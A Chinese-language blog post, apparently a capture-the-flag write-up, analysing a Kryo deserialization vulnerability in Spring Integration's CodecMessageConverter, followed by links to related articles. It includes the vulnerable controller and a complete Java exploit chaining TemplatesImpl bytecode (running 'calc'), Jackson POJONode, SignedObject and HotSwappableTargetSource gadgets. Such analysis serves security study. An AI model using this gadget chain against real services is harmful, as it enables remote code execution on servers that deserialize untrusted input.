前言

Kryo是一个快速序列化/反序列化工具,依赖于字节码生成机制(底层使用了ASM库),因此在序列化速度上有一定的优势,但正因如此,其使用也只能限制在基于JVM的语言上。

Kryo序列化出的结果,是其自定义的,独有的一种格式。由于其序列化出的结果是二进制的,也即byte[],因此像redis这样可以存储二进制数据的存储引擎是可以直接将Kryo序列化出来的数据存进去。当然你也可以选择转换成String的形式存储在其他存储引擎中(性能有损耗)

环境搭建

<dependency>

    <groupId>com.esotericsoftware</groupId>

    <artifactId>kryo</artifactId>

    <version>5.2.0</version>

</dependency>

<dependency>

    <groupId>org.springframework</groupId>

    <artifactId>spring-messaging</artifactId>

    <version>5.3.18</version>

</dependency>

<dependency>

    <groupId>org.springframework.integration</groupId>

    <artifactId>spring-integration-core</artifactId>

    <version>5.3.1.RELEASE</version>

</dependency>

<dependency>

    <groupId>org.javassist</groupId>

    <artifactId>javassist</artifactId>

    <version>3.28.0-GA</version>

</dependency>

例题

package com.sea;

import java.util.Base64;

import org.springframework.integration.codec.CodecMessageConverter;

import org.springframework.integration.codec.kryo.MessageCodec;

import org.springframework.messaging.Message;

import org.springframework.messaging.MessageHeaders;

import org.springframework.stereotype.Controller;

import org.springframework.web.bind.annotation.RequestMapping;

import org.springframework.web.bind.annotation.ResponseBody;

@Controller

public class MessageController {

    public MessageController() {

    }

    @ResponseBody

    @RequestMapping({"/"})

    public Object message(String message) throws Exception {

        byte[] decodemsg;

        if (message == null) {

            decodemsg = Base64.getDecoder().decode("ASsBAQIDAWnkAQBqYXZhLnV0aWwuVVVJxAHLyYj656nh3Rj89bSK7ufJrcoDAXRpbWVzdGFt8AnMwumxjGIBAWNvbS5zZWEuVXNl8gEBMbABc2VhY2xvdWTz");

        } else {

            try {

                decodemsg = Base64.getDecoder().decode(message);

            } catch (Exception var5) {

                decodemsg = Base64.getDecoder().decode("ASsBAQIDAWnkAQBqYXZhLnV0aWwuVVVJxAGBw5uOyvHs1sGsg/nqhOyP9pIDAXRpbWVzdGFt8AnmifmxjGIBAWNvbS5zZWEuVXNl8gEBMbABZXJyb/I=");

            }

        }

        CodecMessageConverter codecMessageConverter = new CodecMessageConverter(new MessageCodec());

        Message<?> messagecode = codecMessageConverter.toMessage(decodemsg, (MessageHeaders)null);

        return messagecode.getPayload();

    }

}

漏洞点在codecMessageConverter.toMessage里面,并且给了一个比较明显的base64字符串,看一下codecMessageConverter类,有一个toMessagefromMessage,对应的就是反序列化和序列化了

Kyro反序列化链

package com.example.kryo;

import com.esotericsoftware.kryo.Kryo;

import com.fasterxml.jackson.databind.node.POJONode;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import com.sun.org.apache.xpath.internal.objects.XString;

import javassist.ClassPool;

import javassist.CtClass;

import javassist.CtConstructor;

import javassist.CtNewConstructor;

import org.objenesis.strategy.StdInstantiatorStrategy;

import org.springframework.aop.target.HotSwappableTargetSource;

import org.springframework.integration.codec.CodecMessageConverter;

import org.springframework.integration.codec.kryo.MessageCodec;

import org.springframework.messaging.Message;

import org.springframework.messaging.MessageHeaders;

import org.springframework.messaging.support.GenericMessage;

import javax.management.BadAttributeValueExpException;

import javax.xml.transform.Templates;

import java.io.ByteArrayOutputStream;

import java.io.IOException;

import java.io.ObjectOutputStream;

import java.lang.reflect.Array;

import java.lang.reflect.Constructor;

import java.lang.reflect.Field;

import java.security.*;

import java.util.Base64;

import java.util.HashMap;

public class Exploit {

    public static void main(String[] args) throws Exception {

        Kryo kryo = new Kryo();

        kryo.setRegistrationRequired(false);

        kryo.setInstantiatorStrategy(new StdInstantiatorStrategy());

        // 二次反序列化

        ClassPool pool = ClassPool.getDefault();

        CtClass ctClass = pool.makeClass("EvilGeneratedByJavassist");

        ctClass.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));

        CtConstructor ctConstructor = CtNewConstructor.make("public EvilGeneratedByJavassist(){Runtime.getRuntime().exec(\"calc\");}", ctClass);

        ctClass.addConstructor(ctConstructor);

        byte[] byteCode = ctClass.toBytecode();

        Templates templates = new TemplatesImpl();

        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

        setFieldValue(templates, "_name", "whatever");

        setFieldValue(templates, "_bytecodes", new byte[][]{byteCode});

        POJONode pojoNode1 = new POJONode(templates);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("whatever");

        setFieldValue(badAttributeValueExpException, "val", pojoNode1);

        // 初始化 SignedObject

        KeyPairGenerator keyPairGenerator;

        keyPairGenerator = KeyPairGenerator.getInstance("DSA");

        keyPairGenerator.initialize(1024);

        KeyPair keyPair = keyPairGenerator.genKeyPair();

        PrivateKey privateKey = keyPair.getPrivate();

        Signature signingEngine = Signature.getInstance("DSA");

        // 设置二次反序列化入口

        SignedObject signedObject = new SignedObject(badAttributeValueExpException, privateKey, signingEngine);

        // 一次反序列化

        POJONode pojoNode2 = new POJONode(signedObject);

        HotSwappableTargetSource h1 = new HotSwappableTargetSource(pojoNode2);

        HotSwappableTargetSource h2 = new HotSwappableTargetSource(new XString("whatever"));

        // 手动构造 HashMap 以防触发正向利用链

        HashMap hashMap = new HashMap();

        setFieldValue(hashMap, "size", 2);

        Class nodeC;

        try {

            nodeC = Class.forName("java.util.HashMap$Node");

        } catch (ClassNotFoundException e) {

            nodeC = Class.forName("java.util.HashMap$Entry");

        }

        Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);

        nodeCons.setAccessible(true);

        Object tbl = Array.newInstance(nodeC, 2);

        Array.set(tbl, 0, nodeCons.newInstance(0, h1, h1, null));

        Array.set(tbl, 1, nodeCons.newInstance(0, h2, h2, null));

        setFieldValue(hashMap, "table", tbl);

        //String serial = serial(hashMap);

        //System.out.println(serial);

        CodecMessageConverter codecMessageConverter = new CodecMessageConverter(new MessageCodec());

        // 序列化

        GenericMessage genericMessage = new GenericMessage(hashMap);

        byte[] decodemsg = (byte[]) codecMessageConverter.fromMessage(genericMessage, null);

        // 反序列化

        Message<?> messagecode = codecMessageConverter.toMessage(decodemsg, (MessageHeaders) null);

        messagecode.getPayload();

    }

    public static String serial(Object o) throws IOException, NoSuchFieldException {

        ByteArrayOutputStream baos = new ByteArrayOutputStream();

        ObjectOutputStream oos = new ObjectOutputStream(baos);

//        Field writeReplaceMethod = ObjectStreamClass.class.getDeclaredField("writeReplaceMethod");

//        writeReplaceMethod.setAccessible(true);

        oos.writeObject(o);

        oos.close();

        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());

        return base64String;

    }

    public static void setFieldValue(Object obj, String name, Object value) throws Exception {

        Field field = obj.getClass().getDeclaredField(name);

        field.setAccessible(true);

        field.set(obj, value);

    }

}

分析一下链子的流程,在toMessage处打个断点,nmmd,断点停不住,艹了,手动分析一波



进入decode方法



这里触发kryo的readObject,手动进去



进入read方法,这里为MapSerializer的read方法

这个map是我们的恶意map,通过触发equals方法来触发我们之后一系列的链子,这个之后的链子就是我们的jackson链,就不多说了,到此为止....

Kryo反序列化链分析的更多相关文章

  1. PHP反序列化链分析

    前言 基本的魔术方法和反序列化漏洞原理这里就不展开了. 给出一些魔术方法的触发条件: __construct()当一个对象创建(new)时被调用,但在unserialize()时是不会自动调用的 __ ...

  2. Dubbo的反序列化安全问题——kryo和fst

    目录 0 前言 1 Dubbo的协议设计 2 Dubbo中的kryo序列化协议触发点 3 Dubbo中的fst序列化协议触发点 3.1 fst复现 3. 2 思路梳理 4 总结 0 前言 本篇是Dub ...

  3. java原生序列化和Kryo序列化性能比较

    简介 最近几年,各种新的高效序列化方式层出不穷,不断刷新序列化性能的上限,最典型的包括: 专门针对Java语言的:Kryo,FST等等 跨语言的:Protostuff,ProtoBuf,Thrift, ...

  4. worker启动executor源码分析-executor.clj

    在"supervisor启动worker源码分析-worker.clj"一文中,我们详细讲解了worker是如何初始化的.主要通过调用mk-worker函数实现的.在启动worke ...

  5. sparkStreaming实时数据处理的优化方面

    1.并行度 在direct方式下,sparkStreaming的task数量是等于kafka的分区数,kakfa单个分区的一般吞吐量为10M/s 常规设计下:kafka的分区数一般为broken节点的 ...

  6. 序列化与反序列化之Kryo

    序列化:把对象转换为字节序列的过程称为对象的序列化. 反序列化:把字节序列恢复为对象的过程称为对象的反序列化. 需要序列化的情况: 当你想把的内存中的对象状态保存到一个文件中或者数据库中时候: 当你想 ...

  7. 高性能的序列化与反序列化:kryo的简单使用

    前言:kryo是个高效的java序列化/反序列化库,目前Twitter.yahoo.Apache.strom等等在使用该技术,比如Apache的spark.hive等大数据领域用的较多. 为什么使用k ...

  8. java kryo序列化与反序列化

    https://blog.csdn.net/lan12334321234/article/details/84907492 问题: https://blog.csdn.net/baidu_384041 ...

  9. [Java反序列化]jdk原生链分析

    jdk原生链分析 原文链接 作为jdk中目前发现的原生链,还是有必要要分析这个用法的.全文仅限尽可能还原挖掘思路 JDK7u21 在很多链中,TemplatesImpl一直发挥着不可或缺的作用,它是位 ...

  10. CommonsCollections2 反序列化利用链分析

    在 ysoserial中 commons-collections2 是用的 PriorityQueue reaObject 作为反序列化的入口 那么就来看一下 java.util.PriorityQu ...

随机推荐

  1. BeanShell Sample 如何使用?

    一 引入: eanShell Sample主要用于生成一些逻辑复杂的数据,例如用于加解密数据: **每次调用前重置bsh.Interpreter:每个BeanShell副本都有自己的解释器副本(每个线 ...

  2. java.util.Arrays 快速学习教程

    在 Java 中,java.util.Arrays类提供的多种数组操作功能,可以有效地执行各种数组相关的操作,使得数组处理变得简单和高效. 打印数组 String[] arr = new String ...

  3. liunx 安装 python 虚拟环境, 各种方法,

    liunx 安装 python 虚拟环境,主要是要解决工作中需要用到python3.6,但是系统的2.7又不能动,安装系统组件时避免造成冲突.低版本的python安装django  uwsgi 等都用 ...

  4. pip 查看某个包有哪些版本并升级

    查看某个包有哪些版本 pip install xxx== 升级包 pip install xxx==1.1

  5. mockjs 前端写完 给后台调 mock.js | 改到2.0版本

    需求:最近活太忙了,实在是联调没有时间了,无奈又拾起来mockjs 1 安装mockjs npm install mockjs // 这是个只在开发的时候用,打包后就没有了,业务更安全 npm ins ...

  6. vitepress 发布到 gitee上的build命令 自动设置base

    docs.vitepress\config.js const argv = require('minimist')(process.argv.slice(2)) const build = argv. ...

  7. SqlServer复制和订阅(实现主从同步)

    SqlServer复制和订阅 注意: 1.登录必须是服务器名称不能是ip 2.订阅服务器不需要提前创建数据库 复制 1.展开要发布的数据库节点,找到复制下的本地发布 2.右击本地发布,选择本地发布 3 ...

  8. 基于恒玄BES2600的轻量级鸿蒙操作系统AIOT开发平台解析之SDK下载和编译

    一 鸿蒙系统 华为鸿蒙系统是一款全新的面向全场景的分布式操作系统,创造一个超级虚拟终端互联的世界,将人.设备.场景有机地联系在一起, 将消费者在全场景生活中接触的多种智能终端实现极速发现.极速连接.硬 ...

  9. -Dmaven.multiModuleProjectDirectory system propery is not set解决方案

    myeclipse中使用maven插件的时候,运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery ...

  10. 毕设系列之JrtpLib H264(裸视频数据) 实时视频传输(发送与接受)

    PS:要转载请注明出处,本人版权所有. PS: 这个只是基于<我自己>的理解, 如果和你的原则及想法相冲突,请谅解,勿喷. 前置说明   本文作为本人csdn blog的主站的备份.(Bl ...